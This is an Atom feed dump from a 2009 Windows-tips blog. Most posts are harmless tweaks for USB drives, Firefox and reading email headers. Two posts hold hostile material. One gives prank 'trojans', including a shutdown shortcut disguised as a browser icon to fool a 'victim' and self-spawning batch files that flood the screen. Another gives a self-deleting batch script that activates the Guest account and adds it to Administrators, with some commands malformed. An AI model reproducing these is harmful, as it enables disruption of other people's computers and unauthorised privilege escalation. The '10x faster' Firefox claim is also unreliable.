rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/4174833829240142619/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/create-your-own-drive.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/4174833829240142619'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/4174833829240142619'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/create-your-own-drive.html' title='Create Your Own Drive'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-6528964353990764493</id><published>2009-11-26T03:40:00.001-08:00</published><updated>2009-11-26T03:40:02.153-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>Make fake viruses in windows [Advance]</title><content type='html'>We Take no responsibility for any of this tricks , Do it at your own risk&lt;br /&gt;&lt;br /&gt;1. Fake computer virus error message&lt;br /&gt;&lt;br /&gt;This one is by far, the easiest and all you have to do is to make a new text document with notepad, type msg * YOUR MESSAGE and save as anything.bat. As always, make sure that you select All files instead of Text Document.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. Forced shutdown trojan.&lt;br /&gt;&lt;br /&gt;This will display a custom error message and start a countdown which will shut down the computer.&lt;br /&gt;&lt;br /&gt;Right-click your desktop and create a new shortcut.&lt;br /&gt;Paste the following code into the Location box in the Create Shortcut menu:&lt;br /&gt;shutdown -s -t 30 -c “Your message here”&lt;br /&gt;Replace 30 with the length of the countdown you want (in seconds) and place your custom error message between the quotes. Click next and name the shortcut to something the victim would be likely to click on such as “Internet explorer” or “My Documents”, etc.&lt;br /&gt;&lt;br /&gt;Next you’d want to change the icon. Right-click on the shortcut you made and click properties. Find the Change Icon button and click it. Choose a suitable icon for the name you chose earlier.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;And that’s all! Now you just have to sneak the shortcut onto the victim’s desktop and run!&lt;br /&gt;&lt;br /&gt;Note: to stop it, open Run from the start menu and type shutdown-a.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. Endless Command prompt windows trojan&lt;br /&gt;&lt;br /&gt;This will open up a series of command prompt windows that will never end.&lt;br /&gt;The basic idea is that there are two .bat files that open the other one when opened, so the other one opens the first one again and the windows just won’t stop coming.&lt;br /&gt;&lt;br /&gt;How to do this:&lt;br /&gt;1. Fire up notepad and type: start 2.bat&lt;br /&gt;2. Save it as 1.bat (make sure you choose all files when saving it)&lt;br /&gt;3. Make another new text document and type: start 1.bat&lt;br /&gt;4. Save it as 2.bat into the same folder as the other one.&lt;br /&gt;&lt;br /&gt;All you have to do to start it is to click on either of them.&lt;br /&gt;&lt;br /&gt;The only way to stop it is to wait for the windows to become so numerous that they are a group on the taskbar. Then you can use Close group to get rid of the bastards.&lt;br /&gt;&lt;br /&gt;4. Fake Command prompt trojan viruses&lt;br /&gt;&lt;br /&gt;This is also a good way to make the victim believe that a worm is gnawing at their hard drive and that they can’t do anything to stop it.&lt;br /&gt;&lt;br /&gt;Open up notepad and type @echo off&lt;br /&gt;&lt;br /&gt;* To make text appear, type it after an echo tag.&lt;br /&gt;* To have the the commands wait for the user to press any key type pause&lt;br /&gt;&lt;br /&gt;(Note: if you write pause &gt;nul it won’t display Press Any key to continue…)&lt;br /&gt;&lt;br /&gt;* To have a complete high-speed description of files in the drive of the .bat file, type dir /s&lt;br /&gt;* You can also initiate any other command we covered earlier, such as shutdown, error message, etc.&lt;br /&gt;&lt;br /&gt;And why no include all of these in one fake virus?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-6528964353990764493?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/6528964353990764493/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/make-fake-viruses-in-windows-advance.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/6528964353990764493'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/6528964353990764493'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/make-fake-viruses-in-windows-advance.html' title='Make fake viruses in windows [Advance]'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-4411463029954502131</id><published>2009-11-26T03:39:00.001-08:00</published><updated>2009-11-26T03:39:15.124-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='registry entry'/><category scheme='http://www.blogger.com/atom/ns#' term='Fun'/><category scheme='http://www.blogger.com/atom/ns#' term='Run'/><title type='text'>change processor name</title><content type='html'>GO TO &lt;br /&gt;&lt;br /&gt;START&gt;&lt;br /&gt;RUN&gt;&lt;br /&gt;TYPE REGEDIT&gt;&lt;br /&gt;HKEY_LOCAL_MACHINE&gt;&lt;br /&gt;HARDWARE&gt;&lt;br /&gt;DISCRIPTION&gt;&lt;br /&gt;SYSTEM&gt;&lt;br /&gt;CENTRAL PROCESSOR&gt;&lt;br /&gt;&lt;br /&gt;ON RIGHT HAND SIDE RIGHT CLICK ON PROCESSORNAMESTRING AND THEN WRITE ANYTHING U WANT IN THAT TEXTBOX&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-4411463029954502131?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/4411463029954502131/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/change-processor-name.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/4411463029954502131'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/4411463029954502131'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/change-processor-name.html' title='change processor name'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-7882160634938424763</id><published>2009-11-26T03:38:00.001-08:00</published><updated>2009-11-26T03:38:24.924-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='pendrive'/><title type='text'>Assign a Permanent Letter to a USB Drive</title><content type='html'>If you have multiple pen drives you might have noticed that every time you put in your drive it will be assigned a different drive letter.&lt;br /&gt;&lt;br /&gt;This can be frustrating when trying to run backups or opening files from software as recent drive letter is changed. Even if you have created playlist of the songs which are in your pen drive it won’t work if the drive letter is changed.&lt;br /&gt;&lt;br /&gt;Here are the steps you will have to follow to assign a permanent drive letter:-&lt;br /&gt;&lt;br /&gt;1. Go to Start &gt; Run&lt;br /&gt;&lt;br /&gt;2. Type mmc in the box and hit enter.&lt;br /&gt;&lt;br /&gt;3. Select File &gt; New&lt;br /&gt;&lt;br /&gt;4. Now select File &gt; Add/Remove Snap-in.&lt;br /&gt;&lt;br /&gt;5. Select “Disk Management” and click “Add”&lt;br /&gt;&lt;br /&gt;6. Select “OK“.&lt;br /&gt;&lt;br /&gt;7. Select “This computer” and then “Finish”&lt;br /&gt;&lt;br /&gt;8. Now press “OK” on the “Add or Remove snap-ins” screen.&lt;br /&gt;&lt;br /&gt;9. Now select “Disk Management” from the left menu.&lt;br /&gt;&lt;br /&gt;10.You will now see all of your drives/partitions in the right hand side panel.&lt;br /&gt;&lt;br /&gt;11.Right click the USB drive you want to assign a permanent letter to and select “Change Drive Letter and Paths…”&lt;br /&gt;&lt;br /&gt;12. Click on “Change”&lt;br /&gt;&lt;br /&gt;13. Select a permanent letter&lt;br /&gt;&lt;br /&gt;14. Click “OK”&lt;br /&gt;&lt;br /&gt;15. It will warn you about making the change – there is little chance programs you use will be affected by this. If they will, you will probably already be aware of this so don’t worry.&lt;br /&gt;&lt;br /&gt;16. The final step is to select File &gt; Save and save the file in the default directory. Close the Console and you are done.&lt;br /&gt;&lt;br /&gt;Now eject your usb drive and put it back in and see whether it is showing the assigned letter or not&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-7882160634938424763?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/7882160634938424763/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/assign-permanent-letter-to-usb-drive.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/7882160634938424763'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/7882160634938424763'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/assign-permanent-letter-to-usb-drive.html' title='Assign a Permanent Letter to a USB Drive'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-3984034445701744433</id><published>2009-11-26T03:37:00.003-08:00</published><updated>2009-11-26T03:37:47.406-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='pendrive'/><title type='text'>Customise your USB memory stick</title><content type='html'>Open Notepad and type in the following&lt;br /&gt;&lt;br /&gt;[autorun]&lt;br /&gt;&lt;br /&gt;icon = *******.ico&lt;br /&gt;&lt;br /&gt;label = *******&lt;br /&gt;&lt;br /&gt;Change the ***** next to icon to what ever the icon is you want to use&lt;br /&gt;ie. monkey.ico&lt;br /&gt;&lt;br /&gt;Change the ***** next to label to whatever you want to name your USB stick&lt;br /&gt;ie. Monkeyweasels USB&lt;br /&gt;&lt;br /&gt;so using my examples you end up with:&lt;br /&gt;&lt;br /&gt;[autorun]&lt;br /&gt;&lt;br /&gt;icon = monkey.ico&lt;br /&gt;&lt;br /&gt;label = Monkeyweasels USB&lt;br /&gt;&lt;br /&gt;Now save this on the root of your USB Drive with the name&lt;br /&gt;&lt;br /&gt;autorun.inf&lt;br /&gt;&lt;br /&gt;Also place the icon you chose to use in the Root of your USB Drive&lt;br /&gt;&lt;br /&gt;Next time you plug in your USB Drive it will appear with the new icon and name&lt;br /&gt;&lt;br /&gt;Hide them by...&lt;br /&gt;&lt;br /&gt;* right-clicking both inf file and icon&lt;br /&gt;* choosing Properties...&lt;br /&gt;* then tick the box entitled Hidden and&lt;br /&gt;* Click OK&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-3984034445701744433?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/3984034445701744433/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/customise-your-usb-memory-stick_26.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3984034445701744433'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3984034445701744433'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/customise-your-usb-memory-stick_26.html' title='Customise your USB memory stick'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-5588375834687146422</id><published>2009-11-26T03:37:00.001-08:00</published><updated>2009-11-26T03:37:16.549-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>Hack admin from xp guest account</title><content type='html'>Well thats possible ..&lt;br /&gt;Please Dont missuse This ARTICLE. Its meant for "Educational Purpose" only or for helping those who have lost their PASSWORD.&lt;br /&gt;HaCk "GUEST" with Admin privileges........&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;echo off&lt;br /&gt;title Please wait...&lt;br /&gt;cls&lt;br /&gt;net user add Username Password /add&lt;br /&gt;net user localgroup Administrators Username /add&lt;br /&gt;net user Guest 420 /active:yes&lt;br /&gt;net localgroup Guests Guest /DELETE&lt;br /&gt;net localgroup Administrators Guest /add&lt;br /&gt;del %0  &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Copy this to notepad and save the file as "Guest2admin.bat"&lt;br /&gt;then u can double click the file to execute or run in the cmd.&lt;br /&gt;it works...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-5588375834687146422?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/5588375834687146422/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/hack-admin-from-xp-guest-account.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/5588375834687146422'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/5588375834687146422'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/hack-admin-from-xp-guest-account.html' title='Hack admin from xp guest account'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-8635499151312997637</id><published>2009-11-26T03:36:00.001-08:00</published><updated>2009-11-26T03:36:06.609-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>Finding IP address of sender in Yahoo, Gmail, Hotmail</title><content type='html'># Log into your Hotmail account with your username and password.&lt;br /&gt;# Click on the Mail tab on the top.&lt;br /&gt;# Open the mail.&lt;br /&gt;# If you do not see the headers above the mail message, your headers are not displayed . To display the headers,&lt;br /&gt;&lt;br /&gt;* Click on Options on the top-right corner&lt;br /&gt;* In the Mail Options page, click on Mail Display Settings&lt;br /&gt;* In Message Headers, make sure Advanced option is checked.&lt;br /&gt;* Click on Ok button&lt;br /&gt;* Go back to the mails and open that mail. &lt;br /&gt;&lt;br /&gt;# If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address&lt;br /&gt;&lt;br /&gt;* Hotmail headers : Daniel ,In this case the IP address of the sender is [68.34.60.59]. This is be the IP address of the sender. &lt;br /&gt;&lt;br /&gt;# If you find a header with Received: from followed by a Gmail proxy like this&lt;br /&gt;&lt;br /&gt;* Hotmail headers : Daniel&lt;br /&gt;* Look for Received: from followed by IP address within square brackets[]. In this case, the IP address of the sender is [69.140.7.58]. &lt;br /&gt;&lt;br /&gt;# Or else if you have headers like this&lt;br /&gt;&lt;br /&gt;* Hotmail headers : Daniel&lt;br /&gt;* Look for Received: from followed by IP address within square brackets[].&lt;br /&gt;In this case, the IP address of the sender is [61.83.145.129] . &lt;br /&gt;&lt;br /&gt;# If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Finding IP Address of the sender in Yahoo Mail!!&lt;br /&gt;&lt;br /&gt;# Log into your Yahoo! mail with your username and password.&lt;br /&gt;# Click on Inbox or whichever folder you have stored your mail.&lt;br /&gt;# Open the mail.&lt;br /&gt;# If you do not see the headers above the mail message, your headers are not displayed . To display the headers,&lt;br /&gt;&lt;br /&gt;* Click on Options on the top-right corner&lt;br /&gt;* In the Mail Options page, click on General Preferences&lt;br /&gt;* Scroll down to Messages where you have the Headers option&lt;br /&gt;* Make sure that Show all headers on incoming messages is selected&lt;br /&gt;* Click on the Save button&lt;br /&gt;* Go back to the mails and open that mail.&lt;br /&gt;&lt;br /&gt;# You should see similar headers like this:&lt;br /&gt;&lt;br /&gt;* Yahoo! headers : Daniel.&lt;br /&gt;&lt;br /&gt;# Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.&lt;br /&gt;# That is be the IP address of the sender! &lt;br /&gt;&lt;br /&gt;Finding IP Address of the sender in Gmail !!&lt;br /&gt;&lt;br /&gt;When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender.&lt;br /&gt;&lt;br /&gt;* Log into your Gmail account with your username and password.&lt;br /&gt;* Open the mail.&lt;br /&gt;* To display the headers,&lt;br /&gt;o Click on More options corresponding to that thread. You should get a bunch of links. Click on Show original&lt;br /&gt;* You should get headers like this:&lt;br /&gt;o Gmail headers : Daniel&lt;br /&gt;* Look for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is 65.119.112.245.&lt;br /&gt;* That is be the IP address of the sender!!&lt;br /&gt;&lt;br /&gt;NOTE:=&lt;br /&gt;This will not work if the sender uses anonymous proxy servers&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-8635499151312997637?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/8635499151312997637/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/finding-ip-address-of-sender-in-yahoo.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8635499151312997637'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8635499151312997637'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/finding-ip-address-of-sender-in-yahoo.html' title='Finding IP address of sender in Yahoo, Gmail, Hotmail'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-2621832808447725139</id><published>2009-11-26T03:35:00.001-08:00</published><updated>2009-11-26T03:35:20.437-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><category scheme='http://www.blogger.com/atom/ns#' term='speedup'/><title type='text'>Make firefox 10x faster, 100% working</title><content type='html'>Here's how tu speed up youre firefox 10x faster&lt;br /&gt;&lt;br /&gt;1. Type "about:config" into the address bar and hit enter. Scroll down and look for the following entries:&lt;br /&gt;&lt;br /&gt;2. Alter the entries as follows:&lt;br /&gt;&lt;br /&gt;Set "network.http.pipelining" to "true"&lt;br /&gt;Set "network.http.proxy.pipelining" to "true"&lt;br /&gt;&lt;br /&gt;set "network.http.pipelining.maxrequests" to some number like 30. This means it will make 30 requests at once.&lt;br /&gt;&lt;br /&gt;3. Lastly right-click anywhere and select New-&gt; Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it recieves.&lt;br /&gt;&lt;br /&gt;try this and you can see the difference&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-2621832808447725139?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/2621832808447725139/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/make-firefox-10x-faster-100-working.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/2621832808447725139'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/2621832808447725139'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/make-firefox-10x-faster-100-working.html' title='Make firefox 10x faster, 100% working'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-3994831212160729459</id><published>2009-11-26T03:34:00.003-08:00</published><updated>2009-11-26T03:34:42.304-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title type='text'>Set Multiple Home Pages In Firefox</title><content type='html'>Did you people ever wish to set-up multiple home pages in Firefox ?&lt;br /&gt;&lt;br /&gt;Here’s the way to do this little but useful little trick.&lt;br /&gt;&lt;br /&gt;Suppose you would like to set Orkut, Google and Yahoo as your homepages. Then try this tweak in Firefox to set multiple homepages. This is what you should do :&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;• Goto Tools&gt;Options&gt;Main&lt;br /&gt;&lt;br /&gt;• In the When Firefox starts drop down menu choose Show my home page&lt;br /&gt;&lt;br /&gt;• In Home page give your homepages separated by a | (pipe symbol)&lt;br /&gt;&lt;br /&gt;Example:-&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;http://www.google.com|http://www.orkut.com|http://www.yahoo.com  &lt;br /&gt;&lt;br /&gt;• Click OK&lt;br /&gt;&lt;br /&gt;Now next time when you start Firefox all of your three home pages will be displayed simultaneously.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-3994831212160729459?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/3994831212160729459/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/set-multiple-home-pages-in-firefox.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3994831212160729459'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3994831212160729459'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/set-multiple-home-pages-in-firefox.html' title='Set Multiple Home Pages In Firefox'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry></feed>
